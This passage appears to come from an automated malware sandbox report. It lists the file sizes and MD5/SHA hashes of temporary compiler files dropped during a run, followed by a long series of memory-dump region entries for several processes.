                                                                                              6f2e404cc71c8097bd0f070b0a5786953f5e0059

                                                                                              SHA256

                                                                                              8bd22736e5d544282a7f9e937f5ab2f87663b84a8ddd236b9cc61d03df50f740

                                                                                              SHA512

                                                                                              50de8708b9aa568b14dd5eed869f993a07690f939f8323991e9b0fe2138a811fb280b670340623cdf060a2b104abf7bc35e16f1e403d5b0bab110d045edd234a

                                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\nsywmio3\nsywmio3.0.cs

                                                                                              Filesize

                                                                                              1004B

                                                                                              MD5

                                                                                              c76055a0388b713a1eabe16130684dc3

                                                                                              SHA1

                                                                                              ee11e84cf41d8a43340f7102e17660072906c402

                                                                                              SHA256

                                                                                              8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                              SHA512

                                                                                              22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\nsywmio3\nsywmio3.cmdline

                                                                                              Filesize

                                                                                              607B

                                                                                              MD5

                                                                                              1e20a606bbbbe1dae36217604d686b0b

                                                                                              SHA1

                                                                                              b66975b7859333d48a37db21e58ac215918607c1

                                                                                              SHA256

                                                                                              fa7f59b4bdd478110ce55a39619d308fa04181b4b010d111c9adecdab00cb896

                                                                                              SHA512

                                                                                              4bf09494962f146d8ebd8740d0fef289b9c4694987c68b00982c840080f3978e0908d0f3f93dcd7368999bccd7ece2fad7b75ba7a82d18138c3df6e0006a0938

                                                                                            • memory/60-56-0x00007FFE1FAC0000-0x00007FFE1FAD9000-memory.dmp

                                                                                              Filesize

                                                                                              100KB

                                                                                            • memory/60-334-0x00007FFE23760000-0x00007FFE2376D000-memory.dmp

                                                                                              Filesize

                                                                                              52KB

                                                                                            • memory/60-319-0x00007FFE0A920000-0x00007FFE0AF0A000-memory.dmp

                                                                                              Filesize

                                                                                              5.9MB

                                                                                            • memory/60-75-0x00007FFE0A920000-0x00007FFE0AF0A000-memory.dmp

                                                                                              Filesize

                                                                                              5.9MB

                                                                                            • memory/60-80-0x00007FFE1FC80000-0x00007FFE1FCAD000-memory.dmp

                                                                                              Filesize

                                                                                              180KB

                                                                                            • memory/60-95-0x00007FFE0A600000-0x00007FFE0A76F000-memory.dmp

                                                                                              Filesize

                                                                                              1.4MB

                                                                                            • memory/60-47-0x00007FFE235D0000-0x00007FFE235F3000-memory.dmp

                                                                                              Filesize

                                                                                              140KB

                                                                                            • memory/60-48-0x00007FFE237F0000-0x00007FFE237FF000-memory.dmp

                                                                                              Filesize

                                                                                              60KB

                                                                                            • memory/60-78-0x00007FFE235D0000-0x00007FFE235F3000-memory.dmp

                                                                                              Filesize

                                                                                              140KB

                                                                                            • memory/60-81-0x00007FFE0A160000-0x00007FFE0A27C000-memory.dmp

                                                                                              Filesize

                                                                                              1.1MB

                                                                                            • memory/60-336-0x00007FFE237F0000-0x00007FFE237FF000-memory.dmp

                                                                                              Filesize

                                                                                              60KB

                                                                                            • memory/60-76-0x00007FFE1A720000-0x00007FFE1A734000-memory.dmp

                                                                                              Filesize

                                                                                              80KB

                                                                                            • memory/60-198-0x00007FFE1A740000-0x00007FFE1A759000-memory.dmp

                                                                                              Filesize

                                                                                              100KB

                                                                                            • memory/60-77-0x00007FFE23760000-0x00007FFE2376D000-memory.dmp

                                                                                              Filesize

                                                                                              52KB

                                                                                            • memory/60-72-0x00007FFE0A280000-0x00007FFE0A5F5000-memory.dmp

                                                                                              Filesize

                                                                                              3.5MB

                                                                                            • memory/60-71-0x000001B400EB0000-0x000001B401225000-memory.dmp

                                                                                              Filesize

                                                                                              3.5MB

                                                                                            • memory/60-266-0x00007FFE1A660000-0x00007FFE1A68E000-memory.dmp

                                                                                              Filesize

                                                                                              184KB

                                                                                            • memory/60-68-0x00007FFE19CC0000-0x00007FFE19D78000-memory.dmp

                                                                                              Filesize

                                                                                              736KB

                                                                                            • memory/60-54-0x00007FFE1FC80000-0x00007FFE1FCAD000-memory.dmp

                                                                                              Filesize

                                                                                              180KB

                                                                                            • memory/60-63-0x00007FFE1A740000-0x00007FFE1A759000-memory.dmp

                                                                                              Filesize

                                                                                              100KB

                                                                                            • memory/60-64-0x00007FFE23780000-0x00007FFE2378D000-memory.dmp

                                                                                              Filesize

                                                                                              52KB

                                                                                            • memory/60-60-0x00007FFE0A600000-0x00007FFE0A76F000-memory.dmp

                                                                                              Filesize

                                                                                              1.4MB

                                                                                            • memory/60-58-0x00007FFE1DA20000-0x00007FFE1DA43000-memory.dmp

                                                                                              Filesize

                                                                                              140KB

                                                                                            • memory/60-337-0x00007FFE1FC80000-0x00007FFE1FCAD000-memory.dmp

                                                                                              Filesize

                                                                                              180KB

                                                                                            • memory/60-66-0x00007FFE1A660000-0x00007FFE1A68E000-memory.dmp

                                                                                              Filesize

                                                                                              184KB

                                                                                            • memory/60-338-0x00007FFE1FAC0000-0x00007FFE1FAD9000-memory.dmp

                                                                                              Filesize

                                                                                              100KB

                                                                                            • memory/60-339-0x00007FFE1DA20000-0x00007FFE1DA43000-memory.dmp

                                                                                              Filesize

                                                                                              140KB

                                                                                            • memory/60-25-0x00007FFE0A920000-0x00007FFE0AF0A000-memory.dmp

                                                                                              Filesize

                                                                                              5.9MB

                                                                                            • memory/60-83-0x00007FFE1DA20000-0x00007FFE1DA43000-memory.dmp

                                                                                              Filesize

                                                                                              140KB

                                                                                            • memory/60-283-0x00007FFE235D0000-0x00007FFE235F3000-memory.dmp

                                                                                              Filesize

                                                                                              140KB

                                                                                            • memory/60-282-0x00007FFE0A920000-0x00007FFE0AF0A000-memory.dmp

                                                                                              Filesize

                                                                                              5.9MB

                                                                                            • memory/60-298-0x000001B400EB0000-0x000001B401225000-memory.dmp

                                                                                              Filesize

                                                                                              3.5MB

                                                                                            • memory/60-293-0x00007FFE0A280000-0x00007FFE0A5F5000-memory.dmp

                                                                                              Filesize

                                                                                              3.5MB

                                                                                            • memory/60-297-0x00007FFE19CC0000-0x00007FFE19D78000-memory.dmp

                                                                                              Filesize

                                                                                              736KB

                                                                                            • memory/60-296-0x00007FFE0A160000-0x00007FFE0A27C000-memory.dmp

                                                                                              Filesize

                                                                                              1.1MB

                                                                                            • memory/60-288-0x00007FFE0A600000-0x00007FFE0A76F000-memory.dmp

                                                                                              Filesize

                                                                                              1.4MB

                                                                                            • memory/60-333-0x00007FFE0A160000-0x00007FFE0A27C000-memory.dmp

                                                                                              Filesize

                                                                                              1.1MB

                                                                                            • memory/60-335-0x00007FFE235D0000-0x00007FFE235F3000-memory.dmp

                                                                                              Filesize

                                                                                              140KB

                                                                                            • memory/60-346-0x00007FFE1A720000-0x00007FFE1A734000-memory.dmp

                                                                                              Filesize

                                                                                              80KB

                                                                                            • memory/60-345-0x00007FFE0A280000-0x00007FFE0A5F5000-memory.dmp

                                                                                              Filesize

                                                                                              3.5MB

                                                                                            • memory/60-344-0x00007FFE19CC0000-0x00007FFE19D78000-memory.dmp

                                                                                              Filesize

                                                                                              736KB

                                                                                            • memory/60-343-0x00007FFE1A660000-0x00007FFE1A68E000-memory.dmp

                                                                                              Filesize

                                                                                              184KB

                                                                                            • memory/60-342-0x00007FFE23780000-0x00007FFE2378D000-memory.dmp

                                                                                              Filesize

                                                                                              52KB

                                                                                            • memory/60-341-0x00007FFE1A740000-0x00007FFE1A759000-memory.dmp

                                                                                              Filesize

                                                                                              100KB

                                                                                            • memory/60-340-0x00007FFE0A600000-0x00007FFE0A76F000-memory.dmp

                                                                                              Filesize

                                                                                              1.4MB

                                                                                            • memory/2792-196-0x000001A2CD270000-0x000001A2CD278000-memory.dmp

                                                                                              Filesize

                                                                                              32KB

                                                                                            • memory/3812-105-0x00007FFE091E0000-0x00007FFE09CA1000-memory.dmp

                                                                                              Filesize

                                                                                              10.8MB

                                                                                            • memory/3812-94-0x00007FFE091E0000-0x00007FFE09CA1000-memory.dmp

                                                                                              Filesize

                                                                                              10.8MB

                                                                                            • memory/3812-82-0x00007FFE091E3000-0x00007FFE091E5000-memory.dmp

                                                                                              Filesize

                                                                                              8KB

                                                                                            • memory/3812-93-0x000001EB71960000-0x000001EB71982000-memory.dmp

                                                                                              Filesize

                                                                                              136KB

                                                                                            • memory/3812-109-0x00007FFE091E0000-0x00007FFE09CA1000-memory.dmp

                                                                                              Filesize

                                                                                              10.8MB